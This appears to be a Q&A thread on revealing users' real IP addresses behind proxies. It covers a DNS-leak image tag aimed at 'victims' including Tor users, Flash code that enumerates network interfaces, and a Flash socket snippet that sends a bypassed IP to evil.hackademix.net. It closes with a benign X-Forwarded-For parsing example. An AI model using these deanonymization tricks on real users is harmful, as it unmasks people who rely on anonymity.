Is there any best-practice (and preferably documented) way of revealing the true IP of a user using an HTTP(S) connection?
I.e., to be able to uncover the true IP from transparent as well as anonymous proxies wherever possible.
If the connection uses proxies which are correctly implemented, discovering the IP through HTTP or TCP can be difficult. You may have some luck in getting closer to the IP using DNS instead. If you generate the page dynamically to contain an image located at a domain that you control, e.g.
    <img src="http://123123.deanonymize.mydomain.com"/>
the browser will perform a lookup on 123123.deanonymize.mydomain.com. This will result in a recursive DNS query that eventually will reach your DNS for mydomain.com. The query will originate from whatever DNS the victim is using, typically the ISP's. So, while it will not give you the exact IP, it may point you in a general direction.
AFAIK, this method works even if the victim uses TOR in vanilla mode, see https://trac.torproject.org/projects/tor/wiki/doc/PreventingDnsLeaksInTor for more information.
Another way may be to use a Java applet to figure out the IP at the client side, but I'm not up-to-date on what limits are in place for that nowadays.
There are many ways to do it. Here are some more methods:
Poll Network Interfaces (Flash, can get local information)
    import flash.net.NetworkInfo;
    import flash.net.NetworkInterface;

    public function findInterface():void
    {
        // Accumulates the report; initialised before the loop so the
        // first concatenation does not start from an undefined value
        var output:String = "";
        var results:Vector.<NetworkInterface> =
            NetworkInfo.networkInfo.findInterfaces();
        for (var i:int = 0; i < results.length; i++)
        {
            // Per-interface properties
            output = output
                + "Name: " + results[i].name + "\n"
                + "DisplayName: " + results[i].displayName + "\n"
                + "MTU: " + results[i].mtu + "\n"
                + "HardwareAddr: " + results[i].hardwareAddress + "\n"
                + "Active: " + results[i].active + "\n";
            // Every address bound to this interface
            for (var j:int = 0; j < results[i].addresses.length; j++)
            {
                output = output
                    + "Addr: " + results[i].addresses[j].address + "\n"
                    + "Broadcast: " + results[i].addresses[j].broadcast + "\n"
                    + "PrefixLength: " + results[i].addresses[j].prefixLength + "\n"
                    + "IPVersion: " + results[i].addresses[j].ipVersion + "\n";
            }
            output = output + "\n";
        }
        trace(output);
    }
Send an XML "ping" (Flash, only affects browser-defined proxies)
    var socket = new XMLSocket();
    socket.onConnect = function(success) {
        socket.onXML = function(doc) {
            getURL("http://evil.hackademix.net/proxy_bypass?ip=" +
                doc.firstChild.firstChild.nodeValue);
            socket.close();
        };
        socket.send(new XML());
    };
    socket.connect("evil.hackademix.net", 9999);
Note that all of your hardware information can be revealed by Flash. (Thanks, TildalWave)
There's a way to do it in Java as well. Essentially, you'd want to turn off Java, Flash, plugins, and JavaScript to avoid being pinged by these methods.
Hiding the IP is the point of anonymous proxies. Thus, if that machine is doing its job, it should not give it away. Although you could try running some JavaScript on the client side (I am not sure if this will work in your case).
For transparent proxies, there is some information in this question. It boils down to using the X-Forwarded-For header.
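The X-Forwarded-For approach from the last answer, as an added example that is not part of any answer above: the header is client-supplied, so a server should only believe the entries appended by proxies it operates and read the list from right to left. The `TRUSTED_PROXIES` ranges, the function names and all sample addresses are constructed assumptions.

```python
import ipaddress

# Assumption: networks of the reverse proxies we operate (constructed values).
TRUSTED_PROXIES = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.0.2.0/24")]

def is_trusted(addr):
    """True if addr belongs to one of our own proxy networks."""
    return any(addr in net for net in TRUSTED_PROXIES)

def parse_hop(text):
    """Parse one X-Forwarded-For entry; None for junk such as 'unknown'."""
    text = text.strip()
    if text.startswith("["):            # "[2001:db8::1]:443"
        text = text[1:].split("]", 1)[0]
    elif text.count(":") == 1:          # "198.51.100.7:4711"
        text = text.split(":", 1)[0]
    try:
        return ipaddress.ip_address(text)
    except ValueError:
        return None

def client_ip(peer, xff_values):
    """Return the nearest address we can vouch for.

    peer       -- source address of the TCP connection
    xff_values -- X-Forwarded-For header values, in the order received
    """
    current = ipaddress.ip_address(peer)
    if not is_trusted(current):
        # Direct client or a proxy we do not run: the header is unverified.
        return str(current)
    hops = [h for value in xff_values for h in value.split(",")]
    # Each trusted proxy appended the address it saw, so walk right to left
    # and stop at the first hop that is not one of ours.
    for hop in reversed(hops):
        addr = parse_hop(hop)
        if addr is None:
            break                       # malformed entry: trust nothing further left
        current = addr
        if not is_trusted(addr):
            break                       # everything left of this is client-controlled
    return str(current)
```

Anything to the left of the first untrusted hop is whatever the client or an upstream proxy chose to send, and an anonymous proxy simply omits it.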